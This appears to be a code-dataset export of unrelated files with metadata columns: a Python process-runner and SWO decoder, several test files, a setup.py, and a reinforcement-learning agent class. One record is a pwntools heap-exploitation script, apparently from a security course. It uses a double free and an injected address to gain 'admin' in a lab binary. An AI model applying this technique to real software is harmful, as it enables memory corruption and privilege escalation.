return thing
def capture_env_var(line, env, printer, prompt):
'''A bit of exe_run that needs to be called from two places'''
# Find a KEY=VALUE bit in the line,
# parse it out and put it in the dictionary
# we were given
pair = line.split('=', 1)
if len(pair) == 2:
env[pair[0]] = pair[1].rstrip()
else:
printer.string("{}WARNING: not an environment variable: \"{}\"".
format(prompt, line))
# Note: if returned_env is given then "set"
# will be executed after the exe and the environment
# variables will be returned in it. The down-side
# of this is that the return value of the exe is,
# of course, lost.
def exe_run(call_list, guard_time_seconds, printer, prompt,
shell_cmd=False, set_env=None, returned_env=None):
'''Call an executable, printing out what it does'''
success = False
start_time = time()
flibbling = False
kill_time = None
read_time = start_time
if returned_env is not None:
# The caller wants the environment after the
# command has run, so, from this post:
# https://stackoverflow.com/questions/1214496/how-to-get-environment-from-a-subprocess
# append a tag that we can detect
# to the command and then call set,
# from which we can parse the environment
call_list.append("&&")
call_list.append("echo")
call_list.append("flibble")
call_list.append("&&")
call_list.append("set")
# I've seen output from set get lost,
# possibly because the process ending
# is asynchronous with stdout,
# so add a delay here as well
call_list.append("&&")
call_list.append("sleep")
call_list.append("2")
try:
# Call the thang
# Note: used to have bufsize=1 here but it turns out
# that is ignored 'cos the output is considered
# binary. Seems to work in any case, I guess
# Winders, at least, is in any case line-buffered.
process = subprocess.Popen(call_list,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=shell_cmd,
env=set_env)
printer.string("{}{}, pid {} started with guard time {} second(s)". \
format(prompt, call_list[0], process.pid,
guard_time_seconds))
# This is over complex but, unfortunately, necessary.
# At least one thing that we try to run, nrfjprog, can
# crash silently: just hangs and sends no output. However
# it also doesn't flush and close stdout and so read(1)
# will hang, meaning we can't read its output as a means
# to check that it has hung.
# So, here we poll for the return value, which is normally
# how things will end, and we start another thread which
# reads from the process's stdout. If the thread sees
# nothing for guard_time_seconds then we terminate the
# process.
read_queue = queue.Queue()
read_thread = threading.Thread(target=read_from_process_and_queue,
args=(process, read_queue))
read_thread.start()
while process.poll() is None:
if guard_time_seconds and (kill_time is None) and \
((time() - start_time > guard_time_seconds) or
(time() - read_time > guard_time_seconds)):
kill_time = time()
printer.string("{}guard time of {} second(s)." \
" expired, stopping {}...".
format(prompt, guard_time_seconds,
call_list[0]))
exe_terminate(process.pid)
line = queue_get_no_exception(read_queue, True, EXE_RUN_QUEUE_WAIT_SECONDS)
read_time = time()
while line is not None:
line = line.rstrip()
if flibbling:
capture_env_var(line, returned_env, printer, prompt)
else:
if returned_env is not None and "flibble" in line:
flibbling = True
else:
printer.string("{}{}".format(prompt, line))
line = queue_get_no_exception(read_queue, True, EXE_RUN_QUEUE_WAIT_SECONDS)
read_time = time()
# Can't join() read_thread here as it might have
# blocked on a read() (if nrfjprog has anything to
# do with it). It will be tidied up when this process
# exits.
# There may still be stuff on the queue, read it out here
line = queue_get_no_exception(read_queue, True, EXE_RUN_QUEUE_WAIT_SECONDS)
while line is not None:
line = line.rstrip()
if flibbling:
capture_env_var(line, returned_env, printer, prompt)
else:
if returned_env is not None and "flibble" in line:
flibbling = True
else:
printer.string("{}{}".format(prompt, line))
line = queue_get_no_exception(read_queue, True, EXE_RUN_QUEUE_WAIT_SECONDS)
# There may still be stuff in the buffer after
# the application has finished running so flush that
# out here
line = process.stdout.readline().decode()
while line:
line = line.rstrip()
if flibbling:
capture_env_var(line, returned_env, printer, prompt)
else:
if returned_env is not None and "flibble" in line:
flibbling = True
else:
printer.string("{}{}".format(prompt, line))
line = process.stdout.readline().decode()
if (process.poll() == 0) and kill_time is None:
success = True
printer.string("{}{}, pid {} ended with return value {}.". \
format(prompt, call_list[0],
process.pid, process.poll()))
except ValueError as ex:
printer.string("{}failed: {} while trying to execute {}.". \
format(prompt, type(ex).__name__, str(ex)))
return success
class ExeRun():
'''Run an executable as a "with:"'''
def __init__(self, call_list, printer, prompt, shell_cmd=False, with_stdin=False):
self._call_list = call_list
self._printer = printer
self._prompt = prompt
self._shell_cmd = shell_cmd
self._with_stdin=with_stdin
self._process = None
def __enter__(self):
if self._printer:
text = ""
for idx, item in enumerate(self._call_list):
if idx == 0:
text = item
else:
text += " {}".format(item)
self._printer.string("{}starting {}...".format(self._prompt,
text))
try:
# Start exe
if self._with_stdin:
self._process = subprocess.Popen(self._call_list,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=self._shell_cmd,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
else:
self._process = subprocess.Popen(self._call_list,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=self._shell_cmd,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
self._printer.string("{}{} pid {} started".format(self._prompt,
self._call_list[0],
self._process.pid))
except (OSError, subprocess.CalledProcessError, ValueError) as ex:
if self._printer:
self._printer.string("{}failed: {} to start {}.". \
format(self._prompt,
type(ex).__name__, str(ex)))
return self._process
def __exit__(self, _type, value, traceback):
del _type
del value
del traceback
# Stop exe
if self._printer:
self._printer.string("{}stopping {}...". \
format(self._prompt,
self._call_list[0]))
return_value = self._process.poll()
if not return_value:
retry = 5
while (self._process.poll() is None) and (retry > 0):
# Try to stop with CTRL-C
self._process.send_signal(signal.CTRL_BREAK_EVENT)
sleep(1)
retry -= 1
return_value = self._process.poll()
if not return_value:
# Terminate with a vengeance
self._process.terminate()
while self._process.poll() is None:
pass
self._printer.string("{}{} pid {} terminated".format(self._prompt,
self._call_list[0],
self._process.pid))
else:
self._printer.string("{}{} pid {} CTRL-C'd".format(self._prompt,
self._call_list[0],
self._process.pid))
else:
self._printer.string("{}{} pid {} already ended".format(self._prompt,
self._call_list[0],
self._process.pid))
return return_value
# Simple SWO decoder: only handles single bytes of application
# data at a time, i.e. what ITM_SendChar() sends.
class SwoDecoder():
'''Take the contents of a byte_array and decode it as SWO'''
def __init__(self, address, replaceLfWithCrLf=False):
self._address = address
self._replace_lf_with_crlf = replaceLfWithCrLf
self._expecting_swit = True
def decode(self, swo_byte_array):
'''Do the decode'''
decoded_byte_array = bytearray()
if swo_byte_array:
for data_byte in swo_byte_array:
# We're looking only for "address" and we also know
# that CMSIS only offers ITM_SendChar(), so packet length
# is always 1, and we only send ASCII characters,
# so the top bit of the data byte must be 0.
#
# For the SWO protocol, see:
#
# https://developer.arm.com/documentation/ddi0314/h/
# instrumentation-trace-macrocell/
# about-the-instrumentation-trace-macrocell/trace-packet-format
#
# When we see SWIT (SoftWare Instrumentation Trace
# I think, anyway, the bit that carries our prints
# off the target) which is 0bBBBBB0SS, where BBBBB is
# address and SS is the size of payload to follow,
# in our case 0x01, we know that the next
# byte is probably data and if it is ASCII then
# it is data. Anything else is ignored.
# The reason for doing it this way is that the
# ARM ITM only sends out sync packets under
# special circumstances so it is not a recovery
# mechanism for simply losing a byte in the
# transfer, which does happen occasionally.
if self._expecting_swit:
if ((data_byte & 0x03) == 0x01) and ((data_byte & 0xf8) >> 3 == self._address):
# Trace packet type is SWIT, i.e. our
# application logging
self._expecting_swit = False
else:
if data_byte & 0x80 == 0:
if (data_byte == 10) and self._replace_lf_with_crlf:
decoded_byte_array.append(13)
decoded_byte_array.append(data_byte)
self._expecting_swit = True
return decoded_byte_array
class PrintThread(threading.Thread):
'''Print thread to organise prints nicely'''
def __init__(self, print_queue):
self._queue = print_queue
self._running = False
threading.Thread.__init__(self)
def stop_thread(self):
'''Helper function to stop the thread'''
self._running = False
def run(self):
'''Worker thread'''
self._running = True
while self._running:
try:
my_string = self._queue.get(block=False, timeout=0.5)
print(my_string)
except queue.Empty:
pass
class PrintToQueue():
'''Print to a queue, if there is one'''
def __init__(self, print_queue, file_handle, include_timestamp=False):
self._queue = print_queue
self._file_handle = file_handle
self._include_timestamp = include_timestamp
def string(self, string, file_only=False):
'''Print a string'''
if self._include_timestamp:
string = strftime(TIME_FORMAT, gmtime()) + " " + string
if not file_only:
if self._queue:
self._queue.put(string)
else:
print(string)
if self._file_handle:
self._file_handle.write(string + "\n")
self._file_handle.flush()
# This stolen from here:
# https://stackoverflow.com/questions/431684/how-do-i-change-the-working-directory-in-python
class ChangeDir():
'''Context manager for changing the current working directory'''
def __init__(self, new_path):
self._new_path = os.path.expanduser(new_path)
self._saved_path = None
def __enter__(self):
'''CD to new_path'''
self._saved_path = os.getcwd()
os.chdir(self._new_path)
def __exit__(self, etype, value, traceback):
'''CD back to saved_path'''
os.chdir(self._saved_path)
class Lock():
'''Hold a lock as a "with:"'''
def __init__(self, lock, guard_time_seconds,
lock_type, printer, prompt):
self._lock = lock
self._guard_time_seconds = guard_time_seconds
self._lock_type = lock_type
self._printer = printer
self._prompt = prompt
self._locked = False
def __enter__(self):
if not self._lock:
return True
# Wait on the lock
if not self._locked:
timeout_seconds = self._guard_time_seconds
self._printer.string("{}waiting up to {} second(s)" \
" for a {} lock...". \
format(self._prompt,
self._guard_time_seconds,
self._lock_type))
count = 0
while not self._lock.acquire(False) and \
((self._guard_time_seconds == 0) or (timeout_seconds > 0)):
sleep(1)
timeout_seconds -= 1
count += 1
if count == 30:
self._printer.string("{}still waiting {} second(s)" \
" for a {} lock (locker is" \
" currently {}).". \
format(self._prompt, timeout_seconds,
self._lock_type, self._lock))
count = 0
if (self._guard_time_seconds == 0) or (timeout_seconds > 0):
self._locked = True
self._printer.string("{}{} lock acquired ({}).". \
format(self._prompt, self._lock_type,
self._lock))
return self._locked
def __exit__(self, _type, value, traceback):
del _type
del value
del traceback
if self._lock and self._locked:
try:
self._lock.release()
self._locked = False
self._printer.string("{}released a {} lock.".format(self._prompt,
self._lock_type))
except RuntimeError:
self._locked = False
self._printer.string("{}{} lock was already released.". \
format(self._prompt, self._lock_type))
def wait_for_completion(list, purpose, guard_time_seconds,
printer, prompt):
'''Wait for a completion list to empty'''
completed = False
if len(list) > 0:
timeout_seconds = guard_time_seconds
printer.string("{}waiting up to {} second(s)" \
" for {} completion...". \
format(prompt, guard_time_seconds, purpose))
count = 0
while (len(list) > 0) and \
((guard_time_seconds == 0) or (timeout_seconds > 0)):
sleep(1)
timeout_seconds -= 1
count += 1
if count == 30:
list_text = ""
for item in list:
if list_text:
list_text += ", "
list_text += str(item)
printer.string("{}still waiting {} second(s)" \
" for {} to complete (waiting" \
" for {}).". \
format(prompt, timeout_seconds,
purpose, list_text))
count = 0
if len(list) == 0:
completed = True
printer.string("{}{} completed.".format(prompt, purpose))
return completed
def reset_nrf_target(connection, printer, prompt):
'''Reset a Nordic NRFxxx target'''
call_list = []
printer.string("{}resetting target...".format(prompt))
# Assemble the call list
call_list.append("nrfjprog")
call_list.append("--reset")
if connection and "debugger" in connection and connection["debugger"]:
call_list.append("-s")
call_list.append(connection["debugger"])
# Print what we're gonna do
tmp = ""
for item in call_list:
tmp += " " + item
printer.string("{}in directory {} calling{}". \
format(prompt, os.getcwd(), tmp))
# Call it
return exe_run(call_list, 60, printer, prompt)
| 42.930101
| 120
| 0.536437
| 4,151
| 38,079
| 4.757408
| 0.166466
| 0.041473
| 0.019445
| 0.016407
| 0.329755
| 0.254203
| 0.214756
| 0.186449
| 0.173587
| 0.150243
| 0
| 0.009467
| 0.370335
| 38,079
| 886
| 121
| 42.978555
| 0.814155
| 0.20896
| 0
| 0.399679
| 0
| 0
| 0.070385
| 0.00084
| 0
| 0
| 0.000538
| 0
| 0
| 1
| 0.05939
| false
| 0.006421
| 0.022472
| 0
| 0.126806
| 0.149278
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddf10fa882b2377b78f180954bd012323f534965
| 514
|
py
|
Python
|
test/unit/test_main.py
|
CMPUT291PROJECT1F18/Mini-Project-1
|
b58144dd80c40466de755877b7c3996f4aa67af9
|
[
"MIT"
] | 1
|
2018-11-06T01:04:13.000Z
|
2018-11-06T01:04:13.000Z
|
test/unit/test_main.py
|
CMPUT291PROJECT1F18/Mini-Project-1
|
b58144dd80c40466de755877b7c3996f4aa67af9
|
[
"MIT"
] | 39
|
2018-10-23T00:28:13.000Z
|
2018-11-06T16:14:56.000Z
|
test/unit/test_main.py
|
CMPUT291PROJECT1F18/Mini-Project-1
|
b58144dd80c40466de755877b7c3996f4aa67af9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""pytests for :mod:`.__main__`"""
from mini_project_1.__main__ import get_parser, main
import mock
def test_get_parser():
parser = get_parser()
assert parser
def test_main(tmpdir):
tmp_file = tmpdir.join("thefile_name.json")
tmp_file_name = str(tmp_file)
with mock.patch('builtins.input', return_value='foo'):
with mock.patch('mini_project_1.shell.MiniProjectShell.cmdloop', return_value='bar'):
main(["-i", tmp_file_name])
| 23.363636
| 93
| 0.680934
| 72
| 514
| 4.5
| 0.569444
| 0.08642
| 0.074074
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007009
| 0.167315
| 514
| 21
| 94
| 24.47619
| 0.75
| 0.13035
| 0
| 0
| 0
| 0
| 0.190909
| 0.102273
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.181818
| false
| 0
| 0.181818
| 0
| 0.363636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddf791c1dd4726087d87f8647d381ae32e01c53c
| 437
|
py
|
Python
|
6. Heap exploitation/exploit_3.py
|
MBWlodarczyk/bso_project
|
a4620fb18d7f789d917627232dc85ef9bcad7e3d
|
[
"MIT"
] | null | null | null |
6. Heap exploitation/exploit_3.py
|
MBWlodarczyk/bso_project
|
a4620fb18d7f789d917627232dc85ef9bcad7e3d
|
[
"MIT"
] | null | null | null |
6. Heap exploitation/exploit_3.py
|
MBWlodarczyk/bso_project
|
a4620fb18d7f789d917627232dc85ef9bcad7e3d
|
[
"MIT"
] | 1
|
2021-05-27T22:04:35.000Z
|
2021-05-27T22:04:35.000Z
|
from pwn import *
def malloc(name):
p.sendlineafter('>> ','1 '+name)
def free(id):
p.sendlineafter('>> ', '2 '+str(id))
p = process("./vuln_3.o")
gdb.attach(p)
for i in range(8):
malloc('a')
malloc('a')
malloc('a')
for i in range(9):
free(i-1)
free(8)
free(9)
free(8)
for i in range(8):
malloc('a')
malloc('\x48\xc0\x04\x08')
malloc('1')
malloc('1')
p.sendlineafter('>> ','1 ' +'admin')
p.interactive()
| 11.5
| 40
| 0.567506
| 73
| 437
| 3.383562
| 0.438356
| 0.11336
| 0.072874
| 0.133603
| 0.202429
| 0.202429
| 0.202429
| 0.202429
| 0
| 0
| 0
| 0.05618
| 0.185355
| 437
| 37
| 41
| 11.810811
| 0.63764
| 0
| 0
| 0.434783
| 0
| 0
| 0.118993
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.043478
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddf7f46a03e2f875d36d3fadd6c70b90528b78f0
| 1,202
|
py
|
Python
|
setup.py
|
originell/sentry-twilio
|
716c444649b38b68f9d6a02986de090bb7e580b9
|
[
"MIT"
] | null | null | null |
setup.py
|
originell/sentry-twilio
|
716c444649b38b68f9d6a02986de090bb7e580b9
|
[
"MIT"
] | 1
|
2017-02-01T16:49:25.000Z
|
2017-02-01T16:49:25.000Z
|
setup.py
|
originell/sentry-twilio
|
716c444649b38b68f9d6a02986de090bb7e580b9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
sentry-twilio
=============
Sentry Notification plugin for Twilio Programmable SMS.
:copyright: 2017 Luis Nell.
:license: MIT, see LICENSE for more details.
"""
from __future__ import absolute_import
from setuptools import setup, find_packages
VERSION = '1.0'
install_requires = [
'twilio==6.0.0rc10',
]
setup(
name='sentry-twilio',
version=VERSION,
author='Luis Nell',
author_email='luis.nell@simpleloop.com',
url='https://github.com/originell/sentry-twilio',
description='Sentry Notification plugin for Twilio Programmable SMS.',
long_description=__doc__,
license='MIT',
package_dir={'': 'src'},
packages=find_packages('src'),
zip_safe=False,
install_requires=install_requires,
include_package_data=True,
entry_points={
'sentry.apps': [
'twilio = sentry_twilio',
],
'sentry.plugins': [
'twilio = sentry_twilio.plugin:TwilioPlugin',
],
},
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Operating System :: OS Independent',
'Topic :: Software Development'
],
)
| 24.04
| 74
| 0.645591
| 126
| 1,202
| 5.97619
| 0.579365
| 0.079681
| 0.047809
| 0.071713
| 0.12749
| 0.12749
| 0.12749
| 0
| 0
| 0
| 0
| 0.011727
| 0.219634
| 1,202
| 49
| 75
| 24.530612
| 0.791045
| 0.147255
| 0
| 0.085714
| 0
| 0
| 0.390364
| 0.056047
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.057143
| 0
| 0.057143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddf8e32544c5c3cd5719527188568b3163339c08
| 3,146
|
py
|
Python
|
tests/test_refresh_subscription.py
|
Fak3/websubsub
|
f7ca8953197104483b152367c716028d841facbb
|
[
"MIT"
] | 4
|
2018-03-18T03:44:24.000Z
|
2019-08-10T00:40:54.000Z
|
tests/test_refresh_subscription.py
|
Fak3/websubsub
|
f7ca8953197104483b152367c716028d841facbb
|
[
"MIT"
] | 9
|
2020-02-12T13:38:38.000Z
|
2021-06-02T01:03:43.000Z
|
tests/test_refresh_subscription.py
|
Fak3/websubsub
|
f7ca8953197104483b152367c716028d841facbb
|
[
"MIT"
] | 2
|
2019-08-10T00:41:00.000Z
|
2020-02-09T10:09:59.000Z
|
import re
from datetime import timedelta
import responses
from django.test import override_settings
from django.utils.timezone import now
from model_mommy.mommy import make
from websubsub.models import Subscription
from websubsub.tasks import refresh_subscriptions, retry_failed
from .base import BaseTestCase, method_url_body
class RefreshSubscriptionsTest(BaseTestCase):
"""
When refresh_subscriptions() task is called, then only verified Subscription with
lease_expiration_time ending soon should be subscribed again.
"""
def test_refresh(self):
# GIVEN hub which returns HTTP_202_ACCEPTED
responses.add('POST', 'http://hub.io', status=202)
# AND verified Subscription with expiration time in 3 hours
torefresh = make(Subscription,
hub_url='http://hub.io',
topic='news-topic1',
callback_urlname='wscallback',
lease_expiration_time=now() + timedelta(hours=3),
subscribe_status='verified'
)
# AND explicitly unsubscribed verified Subscription with
# expiration time in 3 hours
unsubscribed = make(Subscription,
hub_url='http://hub.io',
topic='news-topic2',
callback_urlname='wscallback',
lease_expiration_time=now() + timedelta(hours=3),
subscribe_status='verified',
unsubscribe_status='verified'
)
# AND verified Subscription with expiration time in 3 days
fresh = make(Subscription,
hub_url='http://hub.io',
topic='news-topic3',
callback_urlname='wscallback',
lease_expiration_time=now() + timedelta(days=3),
subscribe_status='verified'
)
# AND non-verified Subscription with expiration time in 3 hours
unverified = make(Subscription,
hub_url='http://hub.io',
topic='news-topic4',
callback_urlname='wscallback',
lease_expiration_time=now() + timedelta(hours=3),
subscribe_status='requesting'
)
# WHEN refresh_subscriptions task is called
refresh_subscriptions.delay()
#retry_failed.delay()
# THEN no new Subscription should get created
assert len(Subscription.objects.all()) == 4
torefresh = Subscription.objects.get(id=torefresh.id)
# AND one POST request to hub should be sent
self.assertEqual([method_url_body(x) for x in responses.calls],
[
('POST', 'http://hub.io/', {
'hub.mode': ['subscribe'],
'hub.topic': [torefresh.topic],
'hub.callback': [torefresh.callback_url]
}),
]
)
# AND only this subscription_status should be changed from `verified` to `verifying`
assert dict(Subscription.objects.values_list('id', 'subscribe_status')) == {
torefresh.id: 'verifying', # changed
unsubscribed.id: 'verified',
fresh.id: 'verified',
unverified.id: 'requesting',
}
| 35.75
| 92
| 0.61602
| 328
| 3,146
| 5.780488
| 0.335366
| 0.066456
| 0.028481
| 0.07173
| 0.39557
| 0.379747
| 0.341772
| 0.341772
| 0.214662
| 0.130274
| 0
| 0.008509
| 0.29021
| 3,146
| 87
| 93
| 36.16092
| 0.840573
| 0.218055
| 0
| 0.220339
| 0
| 0
| 0.125154
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 1
| 0.016949
| false
| 0
| 0.152542
| 0
| 0.186441
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddfc5813cf287a659f99142896404836acf1a2ad
| 9,452
|
py
|
Python
|
src/agents/base.py
|
anindex/drqn-study
|
ab357178bbe6a1e09eda0f19583e8e8444bf4a54
|
[
"MIT"
] | null | null | null |
src/agents/base.py
|
anindex/drqn-study
|
ab357178bbe6a1e09eda0f19583e8e8444bf4a54
|
[
"MIT"
] | null | null | null |
src/agents/base.py
|
anindex/drqn-study
|
ab357178bbe6a1e09eda0f19583e8e8444bf4a54
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import numpy as np
import random
from collections import deque
import torch
from os.path import exists
from torch.nn.functional import smooth_l1_loss, mse_loss # noqa
from torch.optim import Adam, Adagrad, RMSprop # noqa
from tensorboardX import SummaryWriter
def adjust_learning_rate(optimizer, lr):
for param_group in optimizer.param_groups:
param_group['lr'] = lr
class Agent(object):
def __init__(self, env_prototype, model_prototype, memory_prototype=None, **kwargs):
# env
self.env_prototype = env_prototype
self.env_params = kwargs.get('env')
self.env = self.env_prototype(**self.env_params)
self.state_shape = self.env.state_shape
self.action_dim = self.env.action_dim
# model
self.model_prototype = model_prototype
self.model_params = kwargs.get('model')
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.model_params['use_cuda'] = torch.cuda.is_available()
self.model_params['stack_len'] = self.env_params['stack_len']
self.model_params['state_shape'] = (self.model_params['stack_len'] * self.state_shape[0], *self.state_shape[1:]) # state_shape in model: (stack_len * C, H, W)
self.model_params['action_dim'] = self.action_dim
self.model = None
# memory
self.memory_prototype = memory_prototype
self.memory_type = kwargs.get('memory_type', 'random')
self.memory_params = kwargs.get('memory')
self.memory = None
random.seed(self.env_params['seed'])
# logging
self.logger = kwargs.get('logger', logging.getLogger(__name__))
self.model_file = self.model_params.get('model_file', None)
self.log_folder = kwargs.get('log_folder', 'logs')
self.use_tensorboard = kwargs.get('use_tensorboard', True)
if self.use_tensorboard:
self.writer = SummaryWriter(self.log_folder)
self.log_step_interval = kwargs.get('log_step_interval', 100)
self.log_episode_interval = kwargs.get('log_episode_interval', 10)
self.train_visualize = kwargs.get('train_visualize', False)
self.save_best = kwargs.get('save_best', True)
if self.save_best:
self.best_step = None # NOTE: achieves best_reward at this step
self.best_reward = None # NOTE: only save a new model if achieves higher reward
self.retrain = kwargs.get('retrain', True)
self.solved_stop = kwargs.get('solved_stop', True)
self.log_window_size = kwargs.get('log_window_size', 100)
self._reset_training_loggings()
# agent_params
# criteria and optimizer
self.value_criteria = eval(kwargs.get('value_criteria', 'mse_loss'))
self.optimizer_class = eval(kwargs.get('optimizer', 'Adam'))
# hyperparameters
self.episodes = kwargs.get('episodes', 100000)
self.steps = kwargs.get('steps', 22000000)
self.random_eps = kwargs.get('random_eps', 50)
self.learn_start = kwargs.get('learn_start', 1000) # num steps to fill the memory
self.gamma = kwargs.get('gamma', 0.99)
self.clip_grad = kwargs.get('clip_grad', float('inf'))
self.lr = kwargs.get('lr', 0.0001)
self.lr_decay = kwargs.get('lr_decay', False)
self.weight_decay = kwargs.get('weight_decay', 0.)
self.eps_start = kwargs.get('eps_start', 1.0)
self.eps_decay = kwargs.get('eps_decay', 50000) # num of decaying steps
self.eps_end = kwargs.get('eps_end', 0.01)
self.prog_freq = kwargs.get('prog_freq', 2500)
self.train_interval = kwargs.get('train_interval', 1)
self.memory_interval = kwargs.get('memory_interval', 1)
self.action_repetition = kwargs.get('action_repetition', 1)
self.test_nepisodes = kwargs.get('test_nepisodes', 1)
self.target_model_update = kwargs.get('target_model_update', 1000) # update every # steps
self.batch_size = kwargs.get('batch_size', 32)
self.bootstrap_type = kwargs.get('bootstrap_type', 'double_q')
# count step & episode
self.step = 0
self.episode = 0
def _load_model(self):
if self.model_file is not None and exists(self.model_file):
self.model.load_state_dict(torch.load(self.model_file))
self.logger.info('Loaded Model: ' + self.model_file)
else:
self.logger.info('No pretrained Model. Will train from scratch.')
def _save_model(self, step, curr_reward):
if self.model is None:
return
if self.save_best:
if self.best_step is None:
self.best_step = step
self.best_reward = curr_reward
if curr_reward >= self.best_reward:
self.best_step = step
self.best_reward = curr_reward
torch.save(self.model.state_dict(), self.model_file)
self.logger.info('Saved model: %s at best steps: %d and best reward: %d '
% (self.model_file, self.best_step, self.best_reward))
else:
torch.save(self.model.state_dict(), self.model_file)
self.logger.info('Saved model: %s after %d steps: ' % (self.model_file, step))
def _visualize(self, visualize=True):
if visualize:
self.env.visual()
self.env.render()
def _reset_training_loggings(self):
self.window_scores = deque(maxlen=self.log_window_size)
self.window_max_abs_q = deque(maxlen=self.log_window_size)
self.max_abs_q_log = [0] # per step
self.loss_log = [0] # per step
self.total_avg_score_log = [0] # per eps
self.run_avg_score_log = [0] # per eps
self.step_log = [0]
self.eps_log = [0]
def _reset_experiences(self):
self.env.reset()
if self.memory is not None:
self.memory.reset()
def _init_model(self, training=False):
self.model = self.model_prototype(name='Current Model', **self.model_params).to(self.device)
if not self.retrain:
self._load_model() # load pretrained model if provided
self.model.train(mode=training)
if training:
# target_model
self.target_model = self.model_prototype(name='Target Model', **self.model_params).to(self.device)
self._update_target_model_hard()
self.target_model.eval()
# memory
if self.memory_prototype is not None:
self.memory = self.memory_prototype(**self.memory_params)
# experience & states
self._reset_experiences()
def _store_episode(self, episode):
if self.memory_type == 'episodic':
self.memory.add_episode(episode)
else:
self.logger.warn('Only episodic memory can add episode!')
def _store_experience(self, experience, error=0.):
# Store most recent experience in memory.
if self.step % self.memory_interval == 0:
if self.memory_type == 'episodic':
self.memory.add(experience)
elif self.memory_type == 'random':
self.memory.add(experience, error)
else:
raise ValueError('Memory type %s is unsupported!' % self.memory_type)
# Hard update every `target_model_update` steps.
def _update_target_model_hard(self):
self.target_model.load_state_dict(self.model.state_dict())
# Soft update with `(1 - target_model_update) * old + target_model_update * new`.
def _update_target_model_soft(self):
for target_param, local_param in zip(self.target_model.parameters(), self.model.parameters()):
target_param.data.copy_(self.target_model_update * local_param.data + (1.0 - self.target_model_update) * target_param.data)
def _epsilon_greedy(self, q_values):
self.eps = self.eps_end + max(0, (self.eps_start - self.eps_end) * (self.eps_decay - self.episode) / self.eps_decay)
# choose action
if np.random.uniform() < self.eps: # then we choose a random action
action = random.randrange(self.action_dim)
else: # then we choose the greedy action
if self.model_params['use_cuda']:
action = np.argmax(q_values.cpu().numpy())
else:
action = np.argmax(q_values.numpy())
return action
def _create_zero_lstm_hidden(self, batch_size=1):
return (torch.zeros(self.model.num_lstm_layer, batch_size, self.model.hidden_dim).type(self.dtype).to(self.device),
torch.zeros(self.model.num_lstm_layer, batch_size, self.model.hidden_dim).type(self.dtype).to(self.device))
def _get_loss(self, experiences):
raise NotImplementedError()
def _forward(self, states):
raise NotImplementedError()
def _backward(self, experience):
raise NotImplementedError()
def fit_model(self): # training
raise NotImplementedError()
def test_model(self): # testing pre-trained models
raise NotImplementedError()
def set_seed(self, seed=0):
random.seed(seed)
self.env.env.seed(seed)
@property
def dtype(self):
return self.model.dtype
| 44.375587
| 167
| 0.643779
| 1,232
| 9,452
| 4.702922
| 0.193994
| 0.05592
| 0.025889
| 0.017604
| 0.19106
| 0.121332
| 0.107352
| 0.077667
| 0.064895
| 0.051087
| 0
| 0.011247
| 0.247461
| 9,452
| 212
| 168
| 44.584906
| 0.803318
| 0.074587
| 0
| 0.12069
| 0
| 0
| 0.087111
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12069
| false
| 0
| 0.068966
| 0.011494
| 0.218391
| 0.005747
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddfd26bd635a43dc9642fa41b92d7f6a9fd3de78
| 1,449
|
py
|
Python
|
mongo_commander/widgets.py
|
thieman/mongo_commander
|
407cccb1abdf16b3eb07f813f5dd5d9152930f4d
|
[
"MIT"
] | 2
|
2015-02-22T04:52:22.000Z
|
2018-12-14T10:33:25.000Z
|
mongo_commander/widgets.py
|
thieman/mongo_commander
|
407cccb1abdf16b3eb07f813f5dd5d9152930f4d
|
[
"MIT"
] | null | null | null |
mongo_commander/widgets.py
